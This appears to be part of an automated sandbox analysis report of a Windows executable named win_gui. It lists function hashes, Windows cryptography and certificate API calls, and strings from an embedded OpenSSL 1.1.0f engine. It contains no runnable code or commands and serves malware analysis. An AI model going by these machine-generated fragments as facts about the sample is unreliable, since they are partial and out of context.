                                  • Opcode ID: 3cf617efb34de39dbbcadb1ff5ba4b765cbfb0c65711e2ed75ade063018e257e
                                  • Instruction ID: f142d03996f8c1b8379c2ecdee98f709fe4fc5e48d70b16eed594990979e391d
                                  • Opcode Fuzzy Hash: 3cf617efb34de39dbbcadb1ff5ba4b765cbfb0c65711e2ed75ade063018e257e
                                  • Instruction Fuzzy Hash: 6AF10121D092CCDEDF11CBECD585ADEBFB1AF22308F18409AD1947B343C2655A1ADB66
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F133C
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 005F1360
                                  • GetLastError.KERNEL32 ref: 005F1394
                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,?,F0000000), ref: 005F13E3
                                  • CryptGetProvParam.ADVAPI32(00000000,00000002,00000000,00000001,00000001), ref: 005F141E
                                  • GetLastError.KERNEL32 ref: 005F1452
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005F1481
                                  • CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 005F150F
                                  • GetLastError.KERNEL32 ref: 005F1562
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005F15DC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Crypt$ContextErrorLast$ByteCharMultiParamProvReleaseWide$Acquire
                                  • String ID: %lX$%lu. %s$..\..\openssl-1.1.0f\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Error code= 0x$Got max container len %d$Listing containers CSP=%s, type = %d
                                  • API String ID: 2639310310-1232233274
                                  • Opcode ID: dbc0e1168791bdc183a80721f1a90c1b89d20760ea4498aded74f50dc7a9924b
                                  • Instruction ID: 3e611aae11858906c53b1d882594bd5bea03fb8097f0669db3fa6383515aeaa7
                                  • Opcode Fuzzy Hash: dbc0e1168791bdc183a80721f1a90c1b89d20760ea4498aded74f50dc7a9924b
                                  • Instruction Fuzzy Hash: 0D81C671A4170ABBDF20ABA5CC4AFBF7F6DFB44B14F500416FA05AB281D77499408764
                                  APIs
                                  • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,00000000,?), ref: 005F070B
                                  • GetLastError.KERNEL32 ref: 005F073F
                                  • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,00000000,?), ref: 005F07B3
                                  • GetLastError.KERNEL32 ref: 005F07E7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CryptErrorExportLast
                                  • String ID: %lX$%lx$%ux$..\..\openssl-1.1.0f\engines\e_capi.c$DSS1$Error code= 0x$RSA1$aiKeyAlg=0x$magic=0x
                                  • API String ID: 1886928054-1658443189
                                  • Opcode ID: 0e4ac8bb9720c87b9f7126bdc29d5ced9af35a0670749ea7d6716905bbc1fd02
                                  • Instruction ID: 3534bf309aff891bd447a87830578be6ade4048ba5947fe8540ba06c720876f0
                                  • Opcode Fuzzy Hash: 0e4ac8bb9720c87b9f7126bdc29d5ced9af35a0670749ea7d6716905bbc1fd02
                                  • Instruction Fuzzy Hash: B0D14A70A083476FD721AB64CC46F3BFFE9BF94704F08495AF58896283E664D544C7A2
                                  APIs
                                  • CryptEnumProvidersW.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,005EF3A9), ref: 005F1666
                                  • CryptEnumProvidersW.ADVAPI32(00000000,00000000,00000000,?,00000000,?), ref: 005F16A0
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,005EF3A9), ref: 005F1706
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,005EF3A9), ref: 005F1773
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CryptEnumErrorLastProviders
                                  • String ID: %lX$%lu. %s, type %lu$..\..\openssl-1.1.0f\engines\e_capi.c$Available CSPs:$Error code= 0x$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d$capi_list_providers
                                  • API String ID: 747760079-1615478548
                                  • Opcode ID: c3585f9a2e22dbb8c893a43d36b6a7e73c2f265b0e86a804e5a178df191079ee
                                  • Instruction ID: 76d642ff9539e9f46ed57ca17f072f9eaa3817ecaa21168c04b2a05708161a4f
                                  • Opcode Fuzzy Hash: c3585f9a2e22dbb8c893a43d36b6a7e73c2f265b0e86a804e5a178df191079ee
                                  • Instruction Fuzzy Hash: E4416B71641706BBE720BF64CC8BF7B7F8EFB80B44F440416F609A6192E664D940836A
                                  APIs
                                  • CryptAcquireContextW.ADVAPI32(00000004,?,?,?,?), ref: 005F05A0
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 005F05D4
                                  • CryptGetUserKey.ADVAPI32(00000004,?,00000000), ref: 005F060D
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 005F0645
                                  • CryptReleaseContext.ADVAPI32(00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 005F0675
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Crypt$ContextErrorLast$AcquireReleaseUser
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced RSA and AES Cryptographic Provider$capi_get_key, contname=%s, provname=%s, type=%d
                                  • API String ID: 3038057558-3141597722
                                  • Opcode ID: e8fb5984d185b0bc567ceff6651a04224e1079aaa7c9b0e4edddc135bfaa67d0
                                  • Instruction ID: 171d6a521599a00e301b401b3882298209947399349a07daca2ea98f1d7494ca
                                  • Opcode Fuzzy Hash: e8fb5984d185b0bc567ceff6651a04224e1079aaa7c9b0e4edddc135bfaa67d0
                                  • Instruction Fuzzy Hash: 17513B71644306ABEB20AF54CC46F7B7BDEFB94B04F44141AFA05DA292E7B4D540CB51
                                  APIs
                                    • Part of subcall function 005F1AD0: CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 005F1B19
                                    • Part of subcall function 005F1AD0: GetLastError.KERNEL32 ref: 005F1B4F
                                  • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 005F18CE
                                  • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 005F19A3
                                  • CertCloseStore.CRYPT32(?,00000000), ref: 005F19B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CertStore$CertificatesEnum$CloseErrorLastOpen
                                  • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Can't Parse Certificate %d$xXi
                                  • API String ID: 1078304334-2951057248
                                  • Opcode ID: 3a47c0c77919dc598fcc472a674ce72aa16c4b3545cddfe767ffefc16ad34400
                                  • Instruction ID: 7fb6de1a9ce9536ecdb7c35876d2441b21b7603e8f788f645d96ce692d716d46
                                  • Opcode Fuzzy Hash: 3a47c0c77919dc598fcc472a674ce72aa16c4b3545cddfe767ffefc16ad34400
                                  • Instruction Fuzzy Hash: FD51EF71600709AFE711AF249C45F3B7BAAFF85354F040428FA4597212EB35D9158B9A
                                  APIs
                                  • CryptEnumProvidersW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,005EF578,?,?), ref: 005F0DA9
                                  • GetLastError.KERNEL32(?,005EF578,?,?), ref: 005F0DB7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CryptEnumErrorLastProviders
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d
                                  • API String ID: 747760079-4069671840
                                  • Opcode ID: ca308c58b1f52a37f2859e8b94c5f348e77d5144b104694ce008fd1e6031cb74
                                  • Instruction ID: bae64a575802d700c36b7c43204dd49f4168d04fd2d1ceefa6c37c828cb44e80
                                  • Opcode Fuzzy Hash: ca308c58b1f52a37f2859e8b94c5f348e77d5144b104694ce008fd1e6031cb74
                                  • Instruction Fuzzy Hash: 58514B71B403016BE750BB69DC47F6B7B8DBBD4B15F840417F609D72C2EA64D4448392
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005EF7D4
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 005EF7FC
                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,?,F0000000,?,00000000), ref: 005EF816
                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 005EF825
                                  • GetLastError.KERNEL32 ref: 005EF8B2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ByteCharContextCryptMultiWide$AcquireErrorLastRelease
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$capi_ctx_set_provname, name=%s, type=%d
                                  • API String ID: 2868654666-3030445155
                                  • Opcode ID: c4a5f3907f01efedf4806a27353c367f16e75e05af292d907d9313ebeae1345a
                                  • Instruction ID: f41beca88449b60a177059cfa733c16ef7f7d8c46a7d43ae33304c125b2381e5
                                  • Opcode Fuzzy Hash: c4a5f3907f01efedf4806a27353c367f16e75e05af292d907d9313ebeae1345a
                                  • Instruction Fuzzy Hash: CA41D671B40205BBDB20AFA9DC46FAE7B6DFB44725F400126F909EB2C1DB71995087A1
                                  APIs
                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 005E9045
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Time$FileSystem
                                  • String ID: ....................$..\..\openssl-1.1.0f\crypto\rand\md_rand.c$You need to read the OpenSSL FAQ, https://www.openssl.org/docs/faq.html$gfff$jjj
                                  • API String ID: 2086374402-3002219860
                                  • Opcode ID: 421d2b16ba4b0bd0fe94992bb2c54eb536a0862b15550ecd2faba334d1529f4f
                                  • Instruction ID: 0598316b66396ab69d9564abfc5837f694cae27be7487d3b2736eb5e96137b11
                                  • Opcode Fuzzy Hash: 421d2b16ba4b0bd0fe94992bb2c54eb536a0862b15550ecd2faba334d1529f4f
                                  • Instruction Fuzzy Hash: A4F11374A043815ED714AF399C0AB6A7FE6BF85304F08592FF985CA243EA76C449CB52
                                  APIs
                                  • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005F11C0
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005F11DA
                                  Strings
                                  • ..\..\openssl-1.1.0f\engines\e_capi.c, xrefs: 005F1183
                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 005F11B8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ContextCrypt$AcquireRelease
                                  • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Microsoft Enhanced RSA and AES Cryptographic Provider
                                  • API String ID: 2306398074-1702151034
                                  • Opcode ID: 6b9441a6688195af6d10a3a617ae7c7a9372064b7087d83847bc91eb0f7cfdba
                                  • Instruction ID: b24f21a7fb1178e2c6d2703f8a01665aabffdae7881b178dc3d58fb35de55788
                                  • Opcode Fuzzy Hash: 6b9441a6688195af6d10a3a617ae7c7a9372064b7087d83847bc91eb0f7cfdba
                                  • Instruction Fuzzy Hash: 4141A774A41646AAEB213724BC0BF7B3E5ABB40345F040437FF04A52A2FE66E910D66D
                                  APIs
                                  • CryptDestroyKey.ADVAPI32(?), ref: 005F040C
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 005F0417
                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 005F0424
                                  Strings
                                  • ..\..\openssl-1.1.0f\engines\e_capi.c, xrefs: 005F042F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ContextCrypt$CertCertificateDestroyFreeRelease
                                  • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                  • API String ID: 1168903292-3997076816
                                  • Opcode ID: 919f4e661a09c9b0a0f8f0b6b2b284a3b0c08e3271dd170eded530d3cbc07a46
                                  • Instruction ID: 8d61d75e08d5703850653c18a9385ba017e097cc679366f8c47e7997295890c5
                                  • Opcode Fuzzy Hash: 919f4e661a09c9b0a0f8f0b6b2b284a3b0c08e3271dd170eded530d3cbc07a46
                                  • Instruction Fuzzy Hash: 4EE02631640710B7DF201F10FC09F4A7B9EBF44B01F045408FA06A61A0CB2098819751
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005D252D
                                  • IsDebuggerPresent.KERNEL32 ref: 005D25F9
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005D2619
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 005D2623
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                  • String ID:
                                  • API String ID: 254469556-0
                                  • Opcode ID: 4ee8875d8938704698fec011095406442786da71175974c8f177898f5960ab5d
                                  • Instruction ID: e4e74bd6bfe96fedaba332708edaf51d95ba31338f09ce36c9086de7ef87cd8d
                                  • Opcode Fuzzy Hash: 4ee8875d8938704698fec011095406442786da71175974c8f177898f5960ab5d
                                  • Instruction Fuzzy Hash: 2E312975D0531C9BDB21DFA5D989BCCBBB8BF18304F1041AAE409AB250EB709B85CF44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$`<b$?b
                                  • API String ID: 0-740138778
                                  • Opcode ID: aeed9caa3c9fef2a422baf84f325e95b064fc47a610d53abc7d65241fbe7a8ab
                                  • Instruction ID: 51ccdafcc126247692957a9f9254faed24c2dd7c5d9a5e9f590a539714cf7357
                                  • Opcode Fuzzy Hash: aeed9caa3c9fef2a422baf84f325e95b064fc47a610d53abc7d65241fbe7a8ab
                                  • Instruction Fuzzy Hash: E6B217714542508FE368DF25C8A8A6ABBEAFF89304F554A5DD59B2F341C732B502CF82
                                  APIs
                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00674FE3
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00674FED
                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00674FFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 79b3c5ecb019d821d5f028491ca7a6d11eb807aeb1cecaba982604838f197dff
                                  • Instruction ID: ae1376643fcc26b9ac1d866d0de45417e54a1d0d8441b96130907cb94a58e1fe
                                  • Opcode Fuzzy Hash: 79b3c5ecb019d821d5f028491ca7a6d11eb807aeb1cecaba982604838f197dff
                                  • Instruction Fuzzy Hash: AF31C27491121CABCB21DF68D88979CBBB8BF18310F5042EAE81CA6251EB709F858F45
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000003,?,00668E00,00000003,006CAF90,0000000C,00668F57,00000003,00000002,00000000,?,006749E4,00000003), ref: 00668E4B
                                  • TerminateProcess.KERNEL32(00000000,?,00668E00,00000003,006CAF90,0000000C,00668F57,00000003,00000002,00000000,?,006749E4,00000003), ref: 00668E52
                                  • ExitProcess.KERNEL32 ref: 00668E64
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 30d957d7d63e40895633ba8106f357f08742508b6e61b567fb73363c9b8b11de
                                  • Instruction ID: 6222c90cf3c53c079e467663a4dc73f7263671d5874334c59039737a502d6da5
                                  • Opcode Fuzzy Hash: 30d957d7d63e40895633ba8106f357f08742508b6e61b567fb73363c9b8b11de
                                  • Instruction Fuzzy Hash: 32E04632050248AFCF016F20CC0CA8A3B2BEB52782B004618F9089B221CB36DD82CB41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +$0$gfff
                                  • API String ID: 0-3073000171
                                  • Opcode ID: faeb8fbbecf144c05b7db5c90b7c0cd74d200095f7981addb33a3d7bd0da5410
                                  • Instruction ID: f16274f3d8ef857e5f79b00d6228526d4043e4649ebc13a2b60fb302ec8e051e
                                  • Opcode Fuzzy Hash: faeb8fbbecf144c05b7db5c90b7c0cd74d200095f7981addb33a3d7bd0da5410
                                  • Instruction Fuzzy Hash: 1412D7319087919FD7599F2A880072BBFE5BFC9744F446A2DF8D9D3292D7B0C8818B52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$MT\
                                  • API String ID: 0-1976110113
                                  • Opcode ID: 1d36a855821d37a3f5b20b0a8a90753050f23cc2b76184578e64421c17ce947a
                                  • Instruction ID: 24e52e1e9529eb7ab1c2aeda5c6286473af72ef453ef0def960fdf0780b4a3bb
                                  • Opcode Fuzzy Hash: 1d36a855821d37a3f5b20b0a8a90753050f23cc2b76184578e64421c17ce947a
                                  • Instruction Fuzzy Hash: B3C2C571F101298FDF08CFADC891AADB7F2BF88314B55426DD416EB385DA74A942CB84
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: 19e51ccb60a2791c75152ed210bfd7c75904f6c83a4fe1ad1b21dc1d09005ba4
                                  • Instruction ID: 073d29d05c89e445cf9d064b5bf782d87563e6120900c4b08fb482e315ba3e21
                                  • Opcode Fuzzy Hash: 19e51ccb60a2791c75152ed210bfd7c75904f6c83a4fe1ad1b21dc1d09005ba4
                                  • Instruction Fuzzy Hash: 0B3114718006496FCB248E78CC84EFA7BAEDB81354F0082ECF81ED7251E6B09E858B50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e66db1529f6e64ae402a5f57a502f0849d465a18ed4042c3b93763ec7c2b541a
                                  • Instruction ID: 1669507398cf7299e32e49bf3e0ab7fefe57103ef408537346f5e2500c7c1358
                                  • Opcode Fuzzy Hash: e66db1529f6e64ae402a5f57a502f0849d465a18ed4042c3b93763ec7c2b541a
                                  • Instruction Fuzzy Hash: A9023D71E002299BDF14CFA9C9806EDB7F2EF48314F258269E919E7344D731AA41DB94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
